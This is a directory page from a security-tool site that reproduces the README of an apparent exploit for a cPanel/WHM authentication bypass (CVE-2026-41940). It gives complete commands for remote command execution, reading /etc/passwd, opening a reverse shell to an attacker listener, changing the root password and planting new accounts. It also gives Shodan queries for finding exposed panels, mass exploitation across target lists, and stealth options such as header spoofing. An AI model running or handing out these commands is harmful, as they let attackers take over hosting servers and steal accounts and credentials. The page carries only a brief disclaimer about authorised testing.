Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - Best Flow 💥 CRLF injection leads to auth bypass, session hijacking & account leak. ✅ Proxy, custom UA, keep-alive, retries, SSL verify, colored output, file save support. ⚡ Advanced PoC for pentesters. | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingCommand and Control

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Red Teaming
Payload Development
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - Best Flow 💥 CRLF injection leads to auth bypass, session hijacking & account leak. ✅ Proxy, custom UA, keep-alive, retries, SSL verify, colored output, file save support. ⚡ Advanced PoC for pentesters.

View Repository
9281 month agoNot yet reviewed

CVE-2026-41940

🚀 CVE-2026-41940 - cPanel/WHM Authentication Bypass Exploit

Python License CVSS Pentesting

cPanel & WHM Edition - CRLF Injection to Authentication Bypass & Full Session Hijacking

📌 Overview

This exploit leverages CVE-2026-41940, a critical authentication bypass vulnerability in cPanel/WHM. By injecting a crafted CRLF payload into the session management system, it achieves session hijacking, root access, and complete control over the hosting panel without any valid credentials.

🔥 Key Features

🎯 Vulnerable Versions

📍 Shodan Search

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ Disclaimer: This tool is for authorized security testing and educational purposes only. Unauthorized access is illegal.

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ Usage Examples

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 Interactive Shell Commands

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 Remote Command Execution

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 Reverse Shell

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 Post-Exploitation Operations

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 Mass Exploitation (Multi-Target)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ Advanced Options

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 Command Line Arguments

🧪 Testing Environment

Docker (if you want to test safely)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

Or with vulnerable version

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 Related Exploits

Check out my other exploit repositories:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
Download Tool
CategoryFeatures
Exploitation✅ Authentication Bypass via CRLF Injection
✅ WHM Session Hijacking
✅ Security Token Leakage
✅ Instant Root Access
Post-Exploitation✅ Account List Extraction (User + Domain)
✅ Remote Command Execution (RCE)
✅ Reverse Shell (netcat compatible)
✅ File Reading (configs, logs, etc)
✅ Root Password Change
✅ New cPanel User Creation
Scanning✅ Single Target Exploitation
✅ Multi-Target Mass Scan
✅ Multi-Threading (configurable threads)
✅ Port Override Support
Stealth✅ Random Delays Between Requests
✅ X-Forwarded-For Spoofing
✅ Custom User-Agent Support
✅ Proxy Support (HTTP/HTTPS)
Usability✅ Interactive WHM Shell (-i)
✅ Colored Output (colorama)
✅ Verbose/Debug Mode
✅ Account List Export to File
✅ Keep-Alive Session Thread
✅ Retry Mechanism for Unstable Connections
ProductVersionsStatus
cPanel & WHM11.92 - 11.102✅ Confirmed
cPanel & WHM11.104 - 11.110✅ Confirmed
cPanel & WHM11.118 - 11.136⚠️ Limited
cPanel & WHM< 11.86✅ Possibly vulnerable
ShortLongDescriptionDefault
-t--targetSingle target URLRequired (single)
-l--target-fileFile containing target listRequired (mass)
-p--portOverride portAuto-detect
-o--outputSave account list to fileNone
-v--verboseEnable debug outputFalse
-i--interactiveInteractive WHM shellFalse
--proxyHTTP/HTTPS proxyNone
-ua--user-agentCustom User-AgentRandom
--cmdExecute single commandNone
--reverse-shellReverse shell IP:PORTNone
--passwdChange root passwordNone
--adduserCreate new user (USER DOMAIN PASS)None
--readRead file from targetNone
--threadsThreads for mass scan10
--delayKeep-alive interval (seconds)3.0
--max-retriesMax retries per request3
--no-keep-aliveDon't maintain sessionFalse
--ssl-verifyVerify SSL certificatesFalse